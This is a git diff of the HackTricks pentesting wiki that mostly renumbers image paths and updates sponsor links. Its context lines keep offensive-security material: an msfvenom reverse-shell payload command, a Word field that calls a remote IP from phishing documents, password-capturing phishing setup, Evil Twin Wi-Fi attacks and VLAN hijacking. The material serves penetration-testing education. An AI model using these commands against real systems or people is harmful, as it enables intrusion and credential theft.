-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=brute-force) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=brute-force" %}
diff --git a/generic-methodologies-and-resources/external-recon-methodology/README.md b/generic-methodologies-and-resources/external-recon-methodology/README.md
index 1241665f4..df1d46bc7 100644
--- a/generic-methodologies-and-resources/external-recon-methodology/README.md
+++ b/generic-methodologies-and-resources/external-recon-methodology/README.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
@@ -503,9 +503,9 @@ echo www | subzuf facebook.com
 
 Check this blog post I wrote about how to **automate the subdomain discovery** from a domain using **Trickest workflows** so I don't need to launch manually a bunch of tools in my computer:
 
-{% embed url="https://trickest.com/blog/full-subdomain-discovery-using-workflow/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/blog/full-subdomain-discovery-using-workflow/" %}
 
-{% embed url="https://trickest.com/blog/full-subdomain-brute-force-discovery-using-workflow/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/blog/full-subdomain-brute-force-discovery-using-workflow/" %}
 
 ### **VHosts / Virtual Hosts**
 
@@ -730,7 +730,7 @@ There are several tools out there that will perform part of the proposed actions
 
 * All free courses of [**@Jhaddix**](https://twitter.com/Jhaddix) like [**The Bug Hunter's Methodology v4.0 - Recon Edition**](https://www.youtube.com/watch?v=p4JgIu1mceI)
 
-<figure><img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
diff --git a/generic-methodologies-and-resources/pentesting-methodology.md b/generic-methodologies-and-resources/pentesting-methodology.md
index 5b75710c6..21863df48 100644
--- a/generic-methodologies-and-resources/pentesting-methodology.md
+++ b/generic-methodologies-and-resources/pentesting-methodology.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../.gitbook/assets/image (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
@@ -150,7 +150,7 @@ Check also the page about [**NTLM**](../windows-hardening/ntlm/), it could be ve
 * [**CBC-MAC**](../crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md)
 * [**Padding Oracle**](../crypto-and-stego/padding-oracle-priv.md)
 
-<figure><img src="../.gitbook/assets/image (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
diff --git a/generic-methodologies-and-resources/pentesting-network/README.md b/generic-methodologies-and-resources/pentesting-network/README.md
index cffa58c2a..71d048be9 100644
--- a/generic-methodologies-and-resources/pentesting-network/README.md
+++ b/generic-methodologies-and-resources/pentesting-network/README.md
@@ -326,7 +326,7 @@ yersinia -I #Interactive mode
 yersinia -G #For graphic mode
 ```
 
-![](<../../.gitbook/assets/image (266).png>)
+![](<../../.gitbook/assets/image (269).png>)
 
 To enumerate the VLANs it's also possible to generate the DTP Desirable frame with the script [**DTPHijacking.py**](https://github.com/in9uz/VLANPWN/blob/main/DTPHijacking.py)**. D**o not interrupt the script under any circumstances. It injects DTP Desirable every three seconds. **The dynamically created trunk channels on the switch only live for five minutes. After five minutes, the trunk falls off.**
 
@@ -338,7 +338,7 @@ I would like to point out that **Access/Desirable (0x03)** indicates that the DT
 
 By analyzing the STP frames, **we learn about the existence of VLAN 30 and VLAN 60.**
 
-<figure><img src="../../.gitbook/assets/image (121).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (124).png" alt=""><figcaption></figcaption></figure>
 
 #### Attacking specific VLANs
 
@@ -388,7 +388,7 @@ If an attacker knows the value of the **MAC, IP and VLAN ID of the victim host**
 
 Another option for the attacker is to launch a **TCP port scan spoofing an IP controlled by the attacker and accessible by the victim** (probably through internet). Then, the attacker could sniff in the second host owned by him if it receives some packets from the victim.
 
-![](<../../.gitbook/assets/image (187).png>)
+![](<../../.gitbook/assets/image (190).png>)
 
 To perform this attack you could use scapy: `pip install scapy`
 
diff --git a/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md b/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md
index c529886c1..13812d96d 100644
--- a/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md
+++ b/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
@@ -140,7 +140,7 @@ Executing these steps places the attacker in a position to intercept and manipul
 ## References
 - [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
diff --git a/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md b/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md
index 19b61817e..1239bcb81 100644
--- a/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md
+++ b/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
@@ -271,7 +271,7 @@ Moreover, probes which do not have a specifically defined **`servicewaitms`** us
 
 If you don't want to change the values of **`totalwaitms`** and **`tcpwrappedms`** at all in the `/usr/share/nmap/nmap-service-probes` file, you can edit the [parsing code](https://github.com/nmap/nmap/blob/master/service\_scan.cc#L1358) such that these values in the `nmap-service-probes` file are completely ignored.
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
diff --git a/generic-methodologies-and-resources/pentesting-wifi/README.md b/generic-methodologies-and-resources/pentesting-wifi/README.md
index bffca30d6..87f641f6d 100644
--- a/generic-methodologies-and-resources/pentesting-wifi/README.md
+++ b/generic-methodologies-and-resources/pentesting-wifi/README.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (377).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
 
 Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
 
@@ -235,7 +235,7 @@ A packet fuzzer featuring diverse packet sources and a comprehensive set of modi
 
 _**Airgeddon**_ offers most of the attacks proposed in the previous comments:
 
-![](<../../.gitbook/assets/image (92).png>)
+![](<../../.gitbook/assets/image (95).png>)
 
 ## WPS
 
@@ -293,7 +293,7 @@ Some poorly designed systems even let a **Null PIN** (an empty or nonexistent PI
 
 All the proposed WPS attacks can be easily performed using _**airgeddon.**_
 
-![](<../../.gitbook/assets/image (216).png>)
+![](<../../.gitbook/assets/image (219).png>)
 
 * 5 and 6 lets you try **your custom PIN** (if you have any)
 * 7 and 8 perform the **Pixie Dust attack**
@@ -305,11 +305,11 @@ All the proposed WPS attacks can be easily performed using _**airgeddon.**_
 
 So broken and unused nowdays. Just know that _**airgeddon**_ have a WEP option called "All-in-One" to attack this kind of protection. More tools offer similar options.
 
-![](<../../.gitbook/assets/image (429).png>)
+![](<../../.gitbook/assets/image (432).png>)
 
 ***
 
-<figure><img src="../../.gitbook/assets/image (377).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
 
 Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
 
@@ -467,7 +467,7 @@ Reading [https://tools.ietf.org/html/rfc3748#page-27](https://tools.ietf.org/htm
 Even using one of the most secure of authentication methods: **PEAP-EAP-TLS**, it is possible to **capture the username sent in the EAP protocol**. To do so, **capture a authentication communication** (start `airodump-ng` inside a channel and `wireshark` in the same interface) and filter the packets by`eapol`.\
 Inside the "**Response, Identity**" packet, the **username** of the client will appear.
 
-![](<../../.gitbook/assets/image (847).png>)
+![](<../../.gitbook/assets/image (850).png>)
 
 ### Anonymous Identities
 
@@ -634,7 +634,7 @@ You could also create an Evil Twin using **eaphammer** (notice that to create ev
 
 Or using Airgeddon: `Options: 5,6,7,8,9 (inside Evil Twin attack menu).`
 
-![](<../../.gitbook/assets/image (1085).png>)
+![](<../../.gitbook/assets/image (1088).png>)
 
 Please, notice that by default if an ESSID in the PNL is saved as WPA protected, the device won't connect automatically to an Open evil Twin. You can try to DoS the real AP and hope that the user will connect manually to your Open evil twin, or you could DoS the real AP an use a WPA Evil Twin to capture the handshake (using this method you won't be able to let the victim connect to you as you don't know the PSK, but you can capture the handshake and try to crack it).
 
@@ -698,7 +698,7 @@ Or you could also use:
 `Airgeddon` can use previously generated certificated to offer EAP authentication to WPA/WPA2-Enterprise networks. The fake network will downgrade the connection protocol to EAP-MD5 so it will be able to **capture the user and the MD5 of the password**. Later, the attacker can try to crack the password.\
 `Airggedon` offers you the possibility of a **continuous Evil Twin attack (noisy)** or **only create the Evil Attack until someone connects (smooth).**
 
-![](<../../.gitbook/assets/image (933).png>)
+![](<../../.gitbook/assets/image (936).png>)
 
 ### Debugging PEAP and EAP-TTLS TLS tunnels in Evil Twins attacks
 
@@ -713,11 +713,11 @@ Now or later (when you have already captured some authentication intents) you ca
 
 Add a new entry and fill the form with this values: **IP address = any** -- **Port = 0** -- **Protocol = data** -- **Key File** (**select your key file**, to avoid problems select a key file **without being password protected**).
 
-![](<../../.gitbook/assets/image (684).png>)
+![](<../../.gitbook/assets/image (687).png>)
 
 And look at the new **"Decrypted TLS" tab**:
 
-![](<../../.gitbook/assets/image (228).png>)
+![](<../../.gitbook/assets/image (231).png>)
 
 ## KARMA, MANA, Loud MANA and Known beacons attack
 
@@ -830,7 +830,7 @@ These methods, particularly PIN entry, are susceptible to the same vulnerabiliti
 
 TODO: Take a look to [https://github.com/wifiphisher/wifiphisher](https://github.com/wifiphisher/wifiphisher) (login con facebook e imitacionde WPA en captive portals)
 
-<figure><img src="../../.gitbook/assets/image (377).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
 
 Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
 
diff --git a/generic-methodologies-and-resources/phishing-methodology/README.md b/generic-methodologies-and-resources/phishing-methodology/README.md
index 7a4b5453f..d48d41f89 100644
--- a/generic-methodologies-and-resources/phishing-methodology/README.md
+++ b/generic-methodologies-and-resources/phishing-methodology/README.md
@@ -261,7 +261,7 @@ You must **configure a SPF record for the new domain**. If you don't know what i
 
 You can use [https://www.spfwizard.net/](https://www.spfwizard.net) to generate your SPF policy (use the IP of the VPS machine)
 
-![](<../../.gitbook/assets/image (1034).png>)
+![](<../../.gitbook/assets/image (1037).png>)
 
 This is the content that must be set inside a TXT record inside the domain:
 
@@ -379,7 +379,7 @@ Note that **in order to increase the credibility of the email**, it's recommende
 * Search for **public emails** like info@ex.com or press@ex.com or public@ex.com and send them an email and wait for the response.
 * Try to contact **some valid discovered** email and wait for the response
 
-![](<../../.gitbook/assets/image (77).png>)
+![](<../../.gitbook/assets/image (80).png>)
 
 {% hint style="info" %}
 The Email Template also allows to **attach files to send**. If you would also like to steal NTLM challenges using some specially crafted files/documents [read this page](../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md).
@@ -392,7 +392,7 @@ The Email Template also allows to **attach files to send**. If you would also li
 * Mark **Capture Submitted Data** and **Capture Passwords**
 * Set a **redirection**
 
-![](<../../.gitbook/assets/image (823).png>)
+![](<../../.gitbook/assets/image (826).png>)
 
 {% hint style="info" %}
 Usually you will need to modify the HTML code of the page and make some tests in local (maybe using some Apache server) **until you like the results.** Then, write that HTML code in the box.\
@@ -408,7 +408,7 @@ For the redirection you could **redirect the users to the legit main web page**
 * Set a name
 * **Import the data** (note that in order to use the template for the example you need the firstname, last name and email address of each user)
 
-![](<../../.gitbook/assets/image (160).png>)
+![](<../../.gitbook/assets/image (163).png>)
 
 ### Campaign
 
@@ -416,7 +416,7 @@ Finally, create a campaign selecting a name, the email template, the landing pag
 
 Note that the **Sending Profile allow to send a test email to see how will the final phishing email looks like**:
 
-![](<../../.gitbook/assets/image (189).png>)
+![](<../../.gitbook/assets/image (192).png>)
 
 {% hint style="info" %}
 I would recommend to **send the test emails to 10min mails addresses** in order to avoid getting blacklisted making tests.
diff --git a/generic-methodologies-and-resources/phishing-methodology/clone-a-website.md b/generic-methodologies-and-resources/phishing-methodology/clone-a-website.md
index 18a3aa6da..a8b32465c 100644
--- a/generic-methodologies-and-resources/phishing-methodology/clone-a-website.md
+++ b/generic-methodologies-and-resources/phishing-methodology/clone-a-website.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
@@ -45,7 +45,7 @@ goclone <url>
 #https://github.com/trustedsec/social-engineer-toolkit
 ```
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
diff --git a/generic-methodologies-and-resources/phishing-methodology/detecting-phising.md b/generic-methodologies-and-resources/phishing-methodology/detecting-phising.md
index 61d8df6b9..f401fa6a7 100644
--- a/generic-methodologies-and-resources/phishing-methodology/detecting-phising.md
+++ b/generic-methodologies-and-resources/phishing-methodology/detecting-phising.md
@@ -64,11 +64,11 @@ It's not possible to take the previous "Brute-Force" approach but it's actually
 
 The post [https://0xpatrik.com/phishing-domains/](https://0xpatrik.com/phishing-domains/) suggests that you can use Censys to search for certificates affecting a specific keyword and filter by date (only "new" certificates) and by the CA issuer "Let's Encrypt":
 
-![https://0xpatrik.com/content/images/2018/07/cert\_listing.png](<../../.gitbook/assets/image (1112).png>)
+![https://0xpatrik.com/content/images/2018/07/cert\_listing.png](<../../.gitbook/assets/image (1115).png>)
 
 However, you can do "the same" using the free web [**crt.sh**](https://crt.sh). You can **search for the keyword** and the **filter** the results **by date and CA** if you wish.
 
-![](<../../.gitbook/assets/image (516).png>)
+![](<../../.gitbook/assets/image (519).png>)
 
 Using this last option you can even use the field Matching Identities to see if any identity from the real domain matches any of the suspicious domains (note that a suspicious domain can be a false positive).
 
diff --git a/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md b/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md
index 5972da546..c09e123bf 100644
--- a/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md
+++ b/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md
@@ -33,7 +33,7 @@ DOCX files referencing a remote template (File –Options –Add-ins –Manage:
 Go to: _Insert --> Quick Parts --> Field_\
 _**Categories**: Links and References, **Filed names**: includePicture, and **Filename or URL**:_ http://\<ip>/whatever
 
-![](<../../.gitbook/assets/image (152).png>)
+![](<../../.gitbook/assets/image (155).png>)
 
 ### Macros Backdoor
 
diff --git a/generic-methodologies-and-resources/python/README.md b/generic-methodologies-and-resources/python/README.md
index 7fc9bdb55..13b60a659 100644
--- a/generic-methodologies-and-resources/python/README.md
+++ b/generic-methodologies-and-resources/python/README.md
@@ -14,13 +14,13 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=python) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=python" %}
 
 **Interesting pages to check:**
 
@@ -30,13 +30,13 @@ Get Access Today:
 * [**Basic python web requests syntax**](web-requests.md)
 * [**Basic python syntax and libraries**](basic-python.md)
 
-<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=python) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=python" %}
 
 <details>
 
diff --git a/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md b/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md
index 8ab10c698..654d1a450 100644
--- a/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md
+++ b/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md
@@ -69,7 +69,7 @@ Remember that the _**open**_ and _**read**_ functions can be useful to **read fi
 
 Python try to **load libraries from the current directory first** (the following command will print where is python loading modules from): `python3 -c 'import sys; print(sys.path)'`
 
-![](<../../../.gitbook/assets/image (556).png>)
+![](<../../../.gitbook/assets/image (559).png>)
 
 ## Bypass pickle sandbox with the default installed python packages
 
diff --git a/generic-methodologies-and-resources/python/venv.md b/generic-methodologies-and-resources/python/venv.md
index c93d9b545..12c083fb1 100644
--- a/generic-methodologies-and-resources/python/venv.md
+++ b/generic-methodologies-and-resources/python/venv.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -41,7 +41,7 @@ pip3 install wheel
 inside the virtual environment
 ```
 
-<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/generic-methodologies-and-resources/python/web-requests.md b/generic-methodologies-and-resources/python/web-requests.md
index 793e9c983..f66673339 100644
--- a/generic-methodologies-and-resources/python/web-requests.md
+++ b/generic-methodologies-and-resources/python/web-requests.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -121,7 +121,7 @@ term = Terminal()
 term.cmdloop()
 ```
 
-<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/generic-methodologies-and-resources/search-exploits.md b/generic-methodologies-and-resources/search-exploits.md
index 6ac03ed95..276b10dea 100644
--- a/generic-methodologies-and-resources/search-exploits.md
+++ b/generic-methodologies-and-resources/search-exploits.md
@@ -14,13 +14,13 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=search-exploits) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=search-exploits" %}
 
 ### Browser
 
@@ -64,13 +64,13 @@ You can also search in vulners database: [https://vulners.com/](https://vulners.
 
 This searches for exploits in other databases: [https://sploitus.com/](https://sploitus.com)
 
-<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=search-exploits) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=search-exploits" %}
 
 <details>
 
diff --git a/generic-methodologies-and-resources/shells/msfvenom.md b/generic-methodologies-and-resources/shells/msfvenom.md
index 192b1e7c2..55c7379ff 100644
--- a/generic-methodologies-and-resources/shells/msfvenom.md
+++ b/generic-methodologies-and-resources/shells/msfvenom.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (377).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
 
 Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
 
@@ -234,7 +234,7 @@ msfvenom -p cmd/unix/reverse_bash LHOST=<Local IP Address> LPORT=<Local Port> -f
 ```
 {% endcode %}
 
-<figure><img src="../../.gitbook/assets/image (377).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
 
 Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
 
diff --git a/generic-methodologies-and-resources/threat-modeling.md b/generic-methodologies-and-resources/threat-modeling.md
index b42b27a5e..09c18d5ff 100644
--- a/generic-methodologies-and-resources/threat-modeling.md
+++ b/generic-methodologies-and-resources/threat-modeling.md
@@ -2,7 +2,7 @@
 
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -12,7 +12,7 @@ You can check their website and try their engine for **free** at:
 
 {% embed url="https://whiteintel.io" %}
 
----
+***
 
 ## Threat Modeling
 
@@ -124,10 +124,9 @@ Now your finished model should look something like this. And this is how you mak
 
 This is a free tool from Microsoft that helps in finding threats in the design phase of software projects. It uses the STRIDE methodology and is particularly suitable for those developing on Microsoft's stack.
 
-
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -135,4 +134,4 @@ Their primary goal of WhiteIntel is to combat account takeovers and ransomware a
 
 You can check their website and try their engine for **free** at:
 
-{% embed url="https://whiteintel.io" %}
\ No newline at end of file
+{% embed url="https://whiteintel.io" %}
diff --git a/hardware-physical-access/escaping-from-gui-applications.md b/hardware-physical-access/escaping-from-gui-applications.md
index 22b630dd2..db69ee3ea 100644
--- a/hardware-physical-access/escaping-from-gui-applications.md
+++ b/hardware-physical-access/escaping-from-gui-applications.md
@@ -1,4 +1,4 @@
-
+# Escaping from KIOSKs
 
 <details>
 
@@ -9,14 +9,14 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
 
-### [WhiteIntel](https://whiteintel.io)
+#### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -28,7 +28,7 @@ You can check their website and try their engine for **free** at:
 
 ---
 
-# Check physical device
+## Check physical device
 
 |   Component   | Action                                                               |
 | ------------- | -------------------------------------------------------------------- |
@@ -37,7 +37,8 @@ You can check their website and try their engine for **free** at:
 | USB ports     | Connect physical keyboard with more shortcuts                        |
 | Ethernet      | Network scan or sniffing may enable further exploitation             |
 
-# Check for possible actions inside the GUI application
+
+## Check for possible actions inside the GUI application
 
